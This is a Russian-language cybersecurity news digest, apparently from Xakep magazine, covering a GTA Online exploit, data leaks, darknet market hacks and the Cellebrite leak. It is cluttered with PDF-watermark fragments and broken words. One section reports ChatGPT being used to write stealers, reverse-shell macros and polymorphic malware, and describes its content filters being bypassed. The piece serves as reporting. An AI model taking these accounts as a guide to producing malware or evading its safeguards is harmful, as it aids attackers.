|
|
.c |
|
||
|
|
p |
|
|
|
|
|
g |
|
|
|
|
|
|
df |
-x |
|
n |
e |
|
|||
|
|
|
|
ha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
c |
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x ha |
|
|
|
|
← Начало статьи
Tez2 настоятель но рекомендовал всем пользовате лям не играть без брандма уэра и писал, что разработ чики уже знают о проблеме и работают над ее решением .
Вскоре после этого информацию о проблеме размести ли в закреплен ном сообщении на сабредди те GTA Online. Там пользовате лям рекомендовали вообще не заходить в игру, пока разработ чики Rockstar Games не выпустят патч, так как экспло ит для опасной уязвимос ти уже доступен в сети. На Reddit подчерки вали , что даже одиноч ный режим может представ лять угрозу безопасности , а эксплу ата ция бага может приводить к «порче » аккаунта , после чего, вероятно , останет ся только заводить новый.
По информации СМИ, за этот переполох , похоже, ответстве нен разработ чик читов North GTA Online, который добавил в свой продукт новые «функции », связан ные с уязвимостью , 20 января 2023 года (в рамках версии 2.0.0). Также , по информации журналис тов, уязвимость уже получила идентифика тор CVE и отслежива ется как CVE-2023-24059.
При этом разработ чик North GTA Online заявил, что избавил ся от опасных фун кций букваль но на следующий день, 21 января , и принес всем извинения за неожидан ный хаос, который это спровоци рова ло . По его словам , было ошибкой сделать публичны ми функции , связан ные с удалени ем денег игроков и порчей аккаунтов .
Так как Rockstar Games до сих пор не выпустила патчей , специалис ты пре дупрежда ют , что экспло ит для этой уязвимос ти связан с «частичным удален ным выполнени ем произволь ного кода», то есть может привес ти к взлому не только учетных записей GTA Online, но и любого компьюте ра , на котором запущена игра.
Так, Speyedr, разработ чик известно го кастомно го брандма уэра для GTA V под названи ем Guardian, говорит, что злоумыш ленники уже находятся «на гра ни обнаруже ния» способа для полного удален ного выполнения кода через GTA Online. Он подчерки вает, что Guardian по прежнему работает и экспло ит не может его обойти , но необходимо правиль но настро ить брандма уэр, чтобы тот мог защитить пользовате лей от эксплу атации уязвимос ти.
По этой причине разработ чик времен но удалил файлы Guardian с GitHub и призвал всех пользовате лей Windows держать ся подальше от GTA Online, пока ошибка не будет исправлена .
УТЕКЛИ ДАННЫЕ 75% ЖИТЕЛЕЙ РОССИИ
В прошлом году в открытом доступе в результате утечек оказались данные 3/4 россиян . К таким выводам пришли аналити ки компании DLBI (Data Leakage & Breach Intelligence), изучив
более 260 крупных утечек , включая связан ные с «Почтой России », Яндекс Едой и Delivery Club, СДЭК, «Гемотестом », «Туту.ру».
Общий объем проана лизи рован ных утечек составил 99,8 миллиона уникаль ных email-адресов и 109,7 миллиона уникаль ных телефонных номеров.
По мнению основате ля сервиса DLBI Ашота Оганеся на, это можно соотнести с численностью населения России , где у большинс тва есть только один телефонный номер, и тогда получа
ется, что в прошлом году утекли данные 75% всех жителей России или 85% жителей взрос лого (трудос пособного) и старшего возраста .
ДАРКНЕТМАРКЕТПЛЕЙС
SOLARIS ХАКНУЛИ КОНКУРЕНТЫ
Крупный маркет плейс Solaris, специали зиру ющий ся на продаже наркотиков
и других запрещен ных веществ, был захвачен более мелким конкурен том , известным под названи ем Kraken. Хакеры утвержда ют , что взломали кон курирующую площад ку 13 января 2023 года.
Solaris работает не так давно . Он появился на свет после закрытия «Гидры » властями и пытается переманить к себе часть пользовате лей исчезнувшего маркет плейса. Торговая площад ка довольно быстро захватила около 25% рын ка, и через нее уже прошло около 150 миллионов долларов .
Согласно свежему отчету компании Resecurity, от закрытия «Гидры » боль
ше всего выиграли торговые площад ки RuTor, WayAway, Legalizer, OMG!, Solaris
и Nemesis. По данным исследова телей , закрытие «Гидры » принес ло Solaris около 60 тысяч пользовате лей , тогда как упомяну тый выше Kraken получил лишь около 10% от этого количества (пример но 6500 человек).
Журналис ты издания Bleeping Computer сообщили , что Solaris — это русско язычная площад ка, которую исследова тели связыва ют с хак группой Killnet, регулярно устраивающей DDoS-атаки на западные организа ции. К примеру , блокчейн аналити ки из компании Elliptic отследили несколь ко пожертво ваний от Solaris для Killnet на общую сумму более 44 тысяч долларов в биткоинах . Предполага ется, что группа использовала эти деньги , чтобы купить больше «огневой мощи» для проведе ния DDoS-атак.
Также отмечалось , что в декабре прошлого года украинский ИБ специалист
Алекс Холден заявил, что ему удалось взломать Solaris и похитить 25 тысяч долларов , которые он затем пожертво вал украинской гуманитар ной организа ции. Тогда админис траторы Solaris опровер гали заявления о взломе , ссылаясь
на отсутствие доказатель ств , но Холден позже опубликовал более детальное описание своей атаки , а также слил исходный код и базы данных , предположи тельно связан ные с маркет плей сом .
В итоге 13 января 2023 года предста вители Kraken объяви ли, что они зах ватили инфраструктуру Solaris, репозиторий торговой площад ки на GitLab и все исходные коды проекта , благода ря «несколь ким огромным ошибкам в коде».
Заявле ние Kraken гласит , что хакерам потребова лось три дня, чтобы похитить пароли и ключи , хранив шиеся на серверах Solaris открытым текстом , получить доступ к инфраструктуре , расположен ной в Финляндии , а затем без спешки скачать все необходимое . Также злоумыш ленни ки заявили , что отключили бит коин сервер Solaris, «чтобы никто ничего не воровал», и эту информацию под твердили специалис ты компании Elliptic.
Админис тра ция Solaris не делала никаких заявлений о статусе платформы
и обоснован ности заявлений Kraken, но исследова тели полагают , что за всем этим вряд ли стоят политичес кие причины , скорее дело в финансах , а также «рыночных » интересах разных хакерских группировок .
DDOS-АТАКИ В 2022 ГОДУ УЧАСТИЛИСЬ
Аналити ки компании «Ростелеком Солар» подготови ли отчет об атаках на онлайн ресурсы рос сийских компаний по итогам 2022 года. По данным компании , минувший 2022 год изменил весь ландшафт киберугроз , а количество атак выросло в разы.
Самым атакуемым регионом в 2022 году стала Москва , так как именно здесь сконцен три рова на большая часть организа ций. Суммарно на регион пришлось более 500 тысяч DDoS-атак. Далее следуют Уральский федеральный округ (почти 100 тысяч атак) и Централь ный федеральный округ (чуть более 50 тысяч инциден тов ).
Основной поток DDoS-атак не отличал ся высокой мощностью : они не превыша ли 50 Гбит/с. Зато стало больше мощных целевых атак на конкрет ные компании и «массирован ных ударов », приуро чен ных к каким то конкрет ным событиям . Так, в феврале исследова тели зафиксирова ли
760 Гбит/с, что почти в два раза превыша ет самую мощную атаку
Длитель ность большинс тва атак была невысокой , но отдельные из них оказались рекордны ми по продол житель нос ти . В частнос ти , одна из DDoS-атак длилась 2000 часов (почти три месяца).
Наиболь шее число (30%) веб атак было направле но на госсектор . Его атакова ли как минимум в три, а местами и в 12 раз чаще, чем в 2021 году.
ГЛАВУ ФБР БЕСПОКОИТ КИТАЙСКИЙ ИИ
Выступая на Всемир ном экономи ческом форуме в Давосе, директор ФБР Кристофер Рэй заявил, что он глубоко обеспоко ен программой по развитию искусствен ного интеллекта в Китае. Дело в том, что, по его словам , власти страны «не ограничи вают себя правовы ми нор мами», а амбиции Пекина в области ИИ «строятся на основании огромного количества
интеллектуаль |
ной |
собствен ности |
и конфиден циаль |
ных |
данных , которые были похищены |
|||||||
в прошлые годы». |
|
|
|
|
|
|
|
|
|
|
|
|
«Этот вопрос |
глубоко |
нас беспоко |
ит , и думаю, все присутс тву ющие |
должны |
||||||||
→быть обеспоко |
ены |
так же. Что касается |
ИИ в целом — это классичес |
кий |
пример |
технологии , на которую я каждый раз реагирую одинако во. Я думаю: „Ух ты, мы можем такое сделать ?“, а потом думаю: „О боже, они тоже могут такое сде лать“»,
— поделился своими опасени ями Рэй.
ЗАБЫТЫЙ NO FLY LIST
Американ |
ская |
авиаком |
пания |
CommuteAir случай но оставила |
на незащищен ном |
||||||||||||||
сервере |
список |
лиц, которых нельзя |
пускать |
на борт самолетов , летящих |
|||||||||||||||
в США или из США (так называемый |
No Fly List). Эта базу, содержащую |
более |
|||||||||||||||||
полутора |
миллиона |
записей, обнаружил |
швейцар ский |
хакер maia arson crimew, |
|||||||||||||||
считающий |
|
себя хактивис том . Исследова тель |
расска зал , что просто скучал |
||||||||||||||||
и копался в IoT-поисковике |
ZoomEye (китайский |
аналог Shodan), когда наткнул |
|||||||||||||||||
ся на очеред ной незащищен ный |
сервер Jenkins, которых в интернете предос |
||||||||||||||||||
таточно . |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Однако |
|
на этом конкрет |
ном |
сервере |
внимание |
arson |
crimew привлекли |
||||||||||||
аббревиату |
ра ACARS (Airborne Communications Addressing and Reporting |
||||||||||||||||||
System) и многочис ленные |
упомина ния |
слова crew («экипаж »), после чего |
|||||||||||||||||
выяснилось |
, что незащищен ная |
машина принад лежит |
авиаком |
пании |
|||||||||||||||
CommuteAir. |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
На открытом для всех желающих сервере хранились самые разные данные , включая личную информацию пример но 9000 сотрудни ков CommuteAir, путевые листы рейсов . Исследова тель также обнаружил , что может легко получить доступ к планам полетов, информации о техничес ком обслужива нии самолетов и другим данным .
Кроме того, в итоге на сервере нашелся файл с копией так называемо го No Fly List, датирован ной 2019 годом. Этот список содержит более 1,56 мил лиона записей и включает в себя имена и даты рождения , хотя многие записи дублиру ются.
Такие базы появились в начале 2000-х, после террорис тичес ких атак 11 сентября . Сначала они содержали лишь несколь ко десятков имен (в основном это были люди, которые причас тны к террорис тичес кой деятельнос ти или обоснован но подозрева ются в этом), но после терактов и создания Министерс тва внутренней безопасности США списки стали быстро пополнять ся.
Точное количество людей, которые в настоящее время есть в No Fly List, неизвес тно, к тому же списки содержат по несколь ко записей для одного человека , но по последним оценкам в них числятся от 47 тысяч до 81 тысячи человек.
««Это извращен ный продукт американ ских правоох ранителей и полицей- ского государства США в целом, — говорит arson crimew. — Просто список без каких либо надлежащих правовых процедур … В основном
[люди попадают в него] просто на том основании , что они знакомы с кем то или [живут] в одной деревне с кем либо. Это имеет такие мас- » штабы … Мне кажется , что подобному не должно быть места нигде ».
Предста вите ли CommuteAir подтвер дили , что утечка действи тель но имела место и произош ла из за неправиль но настро енно го сервера разработ ки .
««Исследова тель получил доступ к файлам , в том числе к устарев шей версии федерального списка no-fly от 2019 года, где были указаны
имена , фамилии и даты рождения , — говорится в заявлении ком- пании. — Кроме того, благода ря информации , найден ной на сервере , исследова тель обнаружил доступ к базе данных , содержащей личную информацию сотрудни ков CommuteAir. Согласно предваритель ному
рассле дованию, данные клиентов не постра дали. CommuteAir немед- ленно отключила затронутый сервер и начала рассле дование инциден - » та».
В своем блоге arson crimew пообещал |
предос тавить |
список |
журналис там |
||||||||
и правоза щит ным |
организа циям |
ради «обществен |
ного |
блага ». При этом пуб |
|||||||
ликовать список в открытом |
доступе |
исследова тель |
все же счел неправиль |
|
|||||||
ным. |
|
|
|
|
|
|
|
|
|
|
|
ДОХОДЫ ВЫМОГАТЕЛЕЙ ПАДАЮТ
По данным блокчейн аналити ков из Chainalysis и Coveware, доходы от вымогатель ских атак упа ли с 765,6 миллиона долларов в 2021 году до 456,8 миллиона долларов в 2022 году. Экспер
ты объясня ют падение почти на 40% множес твом факторов , но основная причина банальна : все больше жертв попросту отказыва ются платить хакерам.
Общая прибыль вымогателей по годам
Процент компаний , заплатив ших выкуп хакерам в 2022 году, упал до 41% (по сравнению с 50% в 2021 году и 70% в 2020 году).
При этом средние и медианные выкупы значитель но выросли , особен но в последнем квар тале 2022 года по сравнению с предыду щим кварталом . Растет и средний размер компаний , которые становят ся жертва ми вымогателей , — тоже из за того, что злоумыш ленни кам стали реже платить : атаки на более крупные компании позволя ют хакерам требовать более крупные выкупы.
Средняя и медианная сумма выкупа
Медиан ный размер компании
Интерес но , что в 2022 году вымогатель ская малварь оставалась активной в среднем 70 дней, что намного меньше по сравнению со 153 днями в 2021 году и 265 днями в 2020 году.
Иссле дова тели связыва ют это с тем, что злоумыш ленни ки стремят ся скрыть свою активность и действо вать быстрее , посколь ку многие из них работают сразу с несколь кими штаммами вредонос ного ПО.
«Срок жизни » вымогатель ско го ПО по годам
ВANDROID 14
ЗАПРЕТЯТ СТАРЫЕ ПРИЛОЖЕНИЯ
Вгрядущей Android 14 появится запрет на установ ку приложе ний, предназна
ченных для устарев ших версий Android. Нельзя будет даже загрузить APK-файл и установить вручную . Разработ чики надеются , что эти меры помогут в борьбе с вредонос ным ПО.
Правила Google изменились в прошлом месяце, и теперь недавно добав ленные в Play Store приложе ния должны быть ориенти рова ны как минимум на Android 12. Более того, если раньше разработ чик хотел создать приложе ние для более старой версии , он мог попросить своих пользовате лей загрузить нужный APK-файл вручную . Кроме того, если приложе ние для Android не обновлялось после изменения гайдлай нов , Play Store все равно продол жал предос тавлять его пользовате лям , установив шим приложе ние до этого .
В Android 14 требова ния к API будут ужесточены , а установ ку устарев ших приложе ний полностью заблокиру ют. Так, изменения запретят загружать APKфайлы пользовате лям и устанав ливать такие приложе ния магазинам .
Сначала устройства на Android 14 будут блокиро вать только приложе ния , предназна чен ные для совсем старых версий Android. Но со временем планиру ется повысить этот порог до Android 6.0 (Marshmallow). Скорее всего , в итоге каждый произво дитель устройств самостоятель но установит порог для уста ревших приложе ний (если вообще будет его устанав ливать ).
Блокируя устарев шие приложе ния, в Google надеются , что это поможет сдержать распростра нение малвари для Android. Так, разработ чики говорят, что некоторые вредонос ные приложе ния намеренно нацеливают ся на старые версии Android, обходя таким способом защитные механизмы .
Продолжение статьи →
|
|
|
|
hang |
e |
|
|
|
|
|
||
|
|
|
C |
|
|
E |
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
|
d |
|
|||
|
F |
|
|
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
|
NOW! |
o |
||||
|
|
|
|
|
|
|
|
|||||
|
|
|
|
|
BUY |
|
|
|||||
|
|
|
|
to |
|
|
|
|
|
|
||
w Click |
|
|
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
o |
|
|
. |
|
|
c |
|
|
|
|
.c |
|
||
|
|
p |
df |
|
|
|
|
e |
|
|||
|
|
-x |
|
|
g |
|
|
|
||||
|
|
|
|
n |
|
|
|
|
||||
|
|
|
|
ha |
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
|||
|
F |
|
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
||||
|
|
|
|
|
|
|
|||||
|
|
|
|
|
BUY |
|
|
||||
|
|
|
|
to |
|
|
|
|
|
|
|
w Click |
|
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
. |
|
|
c |
|
|
|
.c |
|
||
|
|
p |
df |
|
|
|
e |
|
|||
|
|
|
|
|
g |
|
|
|
|||
|
|
|
|
|
n |
|
|
|
|
||
|
|
|
|
-x ha |
|
|
|
|
|
← Начало статьи
CHATGPT
ЗАИНТЕРЕСОВАЛ
ХАКЕРОВ
Тему создания малвари с помощью ChatGPT уже присталь но изучает ИБ сооб щество , а проведен ные специалис тами эксперимен ты показывают , что такое примене ние инстру мен та действи тель но возможно .
Сначала специалис ты компании Check Point обратили внимание , что зло умышленни ки (в том числе не имеющие никакого опыта в программи рова нии ) уже начали использовать языковую модель OpenAI для создания вредоно сов
и фишинговых писем, которые затем можно будет использовать в вымогатель ских, спамер ских, шпионских , фишинговых и прочих кампани ях.
К примеру , еще в прошлом месяце на неназванном хакерском форуме был опубликован скрипт, автор которого заявил, что это его первый опыт в прог раммирова нии , а ChatGPT сильно помог ему в написании кода. Исследова тели отметили , что полученный код можно превратить в готовую прог рамму вымогатель , если устранить ряд проблем с синтакси сом .
В другом случае еще один участник хак форума с лучшей техничес кой под готовкой опубликовал два примера кода, написанного с использовани ем ChatGPT. Первым был Python-скрипт для кражи информации , который искал определен ные типы файлов (например , PDF, документы MS Ofce и изоб ражения), копировал их во времен ный каталог, сжимал и отправлял на сервер , контро лируемый злоумыш ленником. Второй фрагмент кода был написан на Java и тайно загружал PuTTY, запуская его с помощью PowerShell.
Также стоит упомянуть , что в декабре прошлого года эксперты Check Point и сами попробова ли применить мощности ChatGPT для разработ ки вредонос ного ПО и фишинговых писем. Результаты получились вполне рабочими и пугающи ми.
Например , ChatGPT попросили создать вредонос ный макрос , который можно было скрыть в файле Excel, прикреплен ном к письму . Сами эксперты не написали ни строчки кода, но сразу получили довольно примитив ный скрипт. ChatGPT попросили повторить попытку и улучшить код, после чего качество кода действи тельно значитель но повысилось .
Затем исследова тели использовали более продвинутый ИИ сервис Codex для разработ ки реверс шелла , скрипта для сканиро вания портов , обнаруже ния песочницы и компиляции Python-кода в исполняемый файл Windows.
««В результате мы создали фишинговое электрон ное письмо с прик- репленным к нему документом Excel, содержащим вредонос ный код
VBA, который загружа ет реверс шелл на целевую машину. Вся сложная
работа была продела на ИИ, а нам осталось лишь провес ти атаку », — » резюмирова ли тогда специалис ты.
Ктому же в Check Point отметили быстро растущий интерес к ChatGPT среди русско язычных хакеров: языковая модель может помочь им в масшта биро вании вредонос ной активности . Так, русско язычные злоумыш ленники старают ся обойти ограниче ния для доступа к API OpenAI. На хак форумах уже делятся
советами , как разобрать ся с блокиров кой по IP, решить проблему с банков ски ми картами и номерами телефонов , то есть всем тем, что необходимо
для получения доступа к ChatGPT.
Словом , тема обхода геоблокиро вок сейчас весьма популярна в прес тупном сообщес тве, ведь в настоящее время ChatGPT недоступен в России , Китае, Афганис тане, Украине , Беларуси , Венесуэле и Иране .
Вскоре после Check Point аналити ки из компании CyberArk подробно опи сали, как создавать полиморфные вредоно сы с использовани ем ChatGPT. При чем вскоре они планиру ют опубликовать часть этой работы в сети «в учебных целях».
Фактичес ки в CyberArk сумели обойти фильтры контента ChatGPT и про демонстри ровали, как «с очень небольшими усилиями и инвестициями со сто роны злоумыш ленника можно непрерыв но запрашивать ChatGPT, каждый раз получая уникаль ный, функци ональный и проверен ный фрагмент кода».
Схема предложенной CyberArk атаки
««Это приводит к созданию полиморфно го вредонос ного ПО, которое не демонстри рует вредонос ного поведения при хранении на диске ,
посколь ку получает код от ChatGPT, а затем выполняет его, не оставляя следов в памяти. Кроме того, мы всегда имеем возможность попросить » ChatGPT изменить код», — сообщили специалис ты.
88 200 ДОМЕНОВ В ЗОНЕ .RU ЗАКРЫЛИСЬ
Согласно статис тике «Техничес кого центра Интернет» (поддержи вает главные реестры доменов .ru, .рф, .su), в 2022 году количество доменов в зоне .ru сократилось до 4,93 мил- лиона доменов, лишившись сразу 88 200 доменов. Дело в том, что по итогам 2022 года более 250 тысяч физлиц и ИП перестали быть админис траторами, а также от доменов отка зались многие нерезиден ты и инвесторы .
При этом пространс тва .рф и .su впервые с 2016 года показали рост, хотя и символичес кий — на 1308 (до 676 200 доменов) и 514 (до 105 900) соответс твен но . Для сравнения : в течение 2021 года число доменов зоны .рф снизилось на 36 800, а число доменов .su —
на 3400.
В ТЦИ отмечают , что после начала специаль ной военной операции на Украине крупней ший в мире регистра тор GoDaddy прекратил перепродажу и оформле ние регистра ций доменов .ru и так же поступил сервис 101domains. Регистра торы Namecheap, Bluehost и Ionos ограничи ли или прекратили работу с клиента ми из РФ.
СЛИВ CELLEBRITE И MSAB
Группа хактивис тов Enlace Hacktivista заявила , что аноним ный источник передал ей ПО и документацию компаний Cellebrite и MSAB, которые предос тавляют правоох ранитель ным органам многих стран мира инстру мен ты для взлома мобильных устройств и проведе ния других киберкри мина лис тичес ких операций .
Напом ню , что Cellebrite — это независимые |
киберкри мина лис ты , которые |
||||||||||||||||||||
специали зиру |
ются |
на |
извлечении |
данных |
с |
|
мобильных |
устройств |
(iOS |
||||||||||||
и Android). К примеру |
, несколь |
ко лет назад израиль скую |
фирму называ ли |
||||||||||||||||||
|
|
|
|
|
|||||||||||||||||
основным кандидатом |
на роль подрядчи ка ФБР, когда правоох раните ли иска |
||||||||||||||||||||
ли специалис тов для взлома iPhone террорис та . |
|
|
|
|
|
|
|
|
|
||||||||||||
В целом Cellebrite не раз помога ла правитель |
ствам |
и правоох ранитель |
ным |
||||||||||||||||||
|
|
|
|
|
|
|
|
||||||||||||||
органам |
разных |
стран |
взламывать |
конфиско ван ные |
мобильные |
телефоны (в |
|||||||||||||||
основном за счет использования |
уязвимос тей , которые игнориро вали |
произво |
|||||||||||||||||||
дители устройств ) и не раз подверга лась |
критике |
|
со стороны |
правоза щит ников |
|||||||||||||||||
и СМИ. |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Аналогич ной |
деятельностью |
занимается |
и кримина лис тичес кая |
компания |
|||||||||||||||||
MSAB из Швеции . |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
Как |
сообщили |
предста вите ли |
Enlace |
Hacktivista, в |
их |
руках |
ока |
зались 1,7 Тбайт данных Cellebrite и 103 Гбайт данных MSAB. Файлы уже опуб ликованы в открытом доступе , их можно скачать через сайт DDoSecrets, сайт
Enlace Hacktivista и через торрент .
Хактивис ты напомнили , что инстру менты обеих компаний нередко используют ся для сбора информации с телефонов журналис тов, активис тов и диссиден тов по всему миру, сами компании не раз обвиняли в том, что они работают с реп рессивными режимами , а их ПО неоднократ но применя лось для прямого нарушения прав человека .
При этом нужно заметить, что для Cellebrite это далеко не первая утечка данных . Первый раз, еще в 2016 году, инстру менты киберкри миналистов слу чайно слила в сеть использовав шая их компания McSira Professional Solutions. Годом позже , в 2017-м, Cellebrite и вовсе подвер глась хакерской атаке . Тогда у компании похитили более 900 Гбайт данных , которые в итоге были опуб ликованы в открытом доступе .
ГЛАВА OPENAI СРАВНИЛ CHATGPT С КАЛЬКУЛЯТОРОМ
Сэм Альтман , глава компании OpenAI, создавшей языковую модель ChatGPT, дал изданию StrictlyVC интервью, в котором поделился своими мыслями о будущем ИИ, постарал ся раз веять опасения о создании сильного ИИ (AGI), а также описал лучший и худший сценарий раз вития ситуации для человечес тва. Выбрали для тебя наиболее интерес ные цитаты:
→ «Думаю, лучший сценарий так невероятно хорош, что мне даже трудно это вообразить . Он так хорош, что ты кажешься психом , когда начинаешь рас сказывать об этом. Могу предста вить , каково это, если у нас [человечес тва ] появится невероятное изобилие и системы , которые смогут разрешать тупико вые ситуации , улучшат все аспекты реальнос ти и позволят всем нам жить луч шей жизнью».
«Плохой сценарий (и я считаю , что важно говорить об этом) — это вроде как смерть для всех нас. Поэтому сложно переоце нить важность безопасности ИИ. Но меня больше беспоко ят вероятные злоупот ребления в краткосрочной перспек тиве».
«У нас нет настояще го AGI. Полагаю, [AGI] — это то, чего от нас ждут, но тогда GPT-4 разочарует людей, которые ожидают чего то подобного . Переход к AGI в целом будет не таким резким , как ожидают некоторые . Думаю, он получится гораздо более размытым и постепен ным ».
«Генератив ный текст — это то, к чему нам всем нужно адаптировать ся. Мы адаптирова лись к калькулято рам и изменили тестирова ния на уроках матема тики. Без сомнения , [ChatGPT] — это более экстре мальная версия , но и преиму щества от нее тоже более экстре мальные».
ДАРКНЕТ ПЕРЕХОДИТ НА ПРИЛОЖЕНИЯ ДЛЯ ANDROID
Специалис ты из компании Resecurity заметили , что маркет плей сы даркне та , торгующие наркотика ми и другими незаконными вещества ми , начали исполь зовать собствен ные приложе ния для Android, чтобы повысить конфиден циаль ность и избежать внимания правоох ранитель ных органов .
Иссле дова тели наблюда ют эту тенденцию с третьего квартала 2022 года. По их мнению , такое поведение преступни ков стало ответом на прошлогод ние действия правоох ранитель ных органов в целом и закрытие «Гидры » в частнос ти. После ликвидации этого маркет плей са правоох раните лями несколь ко более мелких игроков попытались восполь зовать ся ситуацией и переманить аудиторию «Гидры » к себе.
Экспер ты привели сразу семь примеров торговых площадок , выпустивших APK-файлы собствен ных Android-приложе ний, через которые клиенты могут получить доступ к магазинам и сервисам : Yakudza, TomFord24, 24Deluxe, PNTS32, Flakka24, 24Cana и MapSTGK. Интерес но, что все они использовали движок M-Club CMS для создания своих APK, то есть, скорее всего , восполь зовались услугами одного и того же разработ чика.
««Некоторые из этих мобильных приложе ний были недавно обнаруже ны нашими экспертами на мобильных устройствах , изъятых правоох -
ранительными органами , они принад лежали несколь ким подозрева - емым, причас тным к торговле наркотика ми и другим незаконным опе- » рациям », — расска зали в Resecurity.
Отчет компании гласит , что такие приложе ния позволя ют передавать данные о заказах наркотиков , а также отправлять покупателю географичес кие коор
динаты «клада », оставленного курьером . Так как обмен информацией теперь происхо дит в несколь ких разных приложе ниях , это порождает фрагмента цию
и мешает правоох ранитель |
ным |
органам |
отслеживать |
преступни ков . |
|||||
«Информация |
(в приложе |
ниях ) |
передается |
в |
виде |
изображений |
|||
«для предот вращения возможной |
индексации . Сообщения |
могут содер- |
илюбую другую информацию для его поиска », — сообщили аналити ки. »
ВResecurity считают , что большинс тво новых торговых площадок в 2023 году будут использовать собствен ные приложе ния для Android, которые постепен но вообще заменят собой привыч ные пользовате лям форумы и маркет плейсы.
ДРУГИЕ ИНТЕРЕСНЫЕ СОБЫТИЯ МЕСЯЦА
Приват ные репозитории Slack на GitHub скомпро мети рова ны
Данные 200 миллионов пользовате лей Twitter опубликова ны в открытом доступе Хакеры обходят CAPTCHA на GitHub для автомати зации создания учетных записей Иссле дователи взломали автомобиль ные номера, работающие на электрон ных чернилах ИИ Microsoft может имитиро вать голос человека по трехсекун дному образцу
В защищенном мессен джере Threema нашли серьезные уязвимос ти
Хакеры утвержда ют, что похитили данные 3,5 миллиона пользовате лей почты Mail.ru
Американ ские власти закрыли криптовалют ную биржу Bitzlato, связав ее с Conti и Hydra
Малварь Hook позволя ет удален но контро лировать смартфо ны на Android
Хакеры продают исходники League of Legends на аукционе
|
|
|
hang |
e |
|
|
|
|
||
|
|
C |
|
|
E |
|
|
|||
|
X |
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
|
d |
|
|
|
F |
|
|
|
|
|
|
|
t |
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|
||
|
|
|
|
|
|
|
||||
|
wClick |
|
BUY |
o m |
HEADER |
|||||
|
to |
|
|
|
||||||
|
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
c |
|
|
|
.c |
|
||
|
. |
|
|
|
|
|
|
|||
|
p |
|
|
|
|
|
g |
|
|
|
|
|
df |
-x |
|
n |
e |
|
|||
|
|
|
ha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
c |
|
|
|
o |
|
|
. |
|
|
|
|
.c |
|
|||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x ha |
|
|
|
|
РАЗБИРАЕМСЯ С ЮРИДИЧЕСКИМ СТАТУСОМ
ТВОРЧЕСТВА НЕЙРОСЕТЕЙ
Диффузи онные нейросети Stable Difusion, Midjourney, Dream и им подобные стоят на пороге превращения из заниматель ной игрушки в рабочий инстру мент . Что дол жно произой ти , чтобы творчес тво искусс твенного интеллекта смогло выйти из юридичес кой «серой зоны»?
Олег Афонин
Эксперт по мобильной криминалистике компании «Элкомсофт» aoleg@voicecallcentral.com
Генери руемые нейросетя ми изображения не только всколых нули пользовате лей соцсетей , но и нашли вполне «взрослое » примене ние. Картинки , которые выдают нейросети , вовсю используют ся для создания иллюстра ций (в том чис ле и в «Хакере») — и в исходном виде, и художниками в качестве основы .
Диффузи онные нейросети тем временем работают в своеоб разной «серой зоне» авторско го права . Крупные компании обходят творчес тво нейросетей стороной , опасаясь возможных юридичес ких последс твий, а частные поль зователи о легальных аспектах даже не задумывают ся.
«Девочка с персиками », Midjourney, по мотивам Валентина Серова
Юридичес кая |
|
база, регулирующая |
деятельность |
искусствен |
ного |
интеллекта , |
||||||||||||||||||||||||||||
не наработана ; законы об авторском |
праве нуждают |
ся в уточнени ях . Попробу |
|
|||||||||||||||||||||||||||||||
ем разобрать |
ся , нарушают ли что нибудь создатели |
диффузи онных |
ней |
|||||||||||||||||||||||||||||||
росетей и потребите ли сгенери рован |
ных ими изображений . |
|
|
|
|
|
|
|
|
|
|
|||||||||||||||||||||||
«Художествен |
ные » диффузи онные |
нейросети |
способ ны создавать |
необыч |
||||||||||||||||||||||||||||||
ные, а при |
|
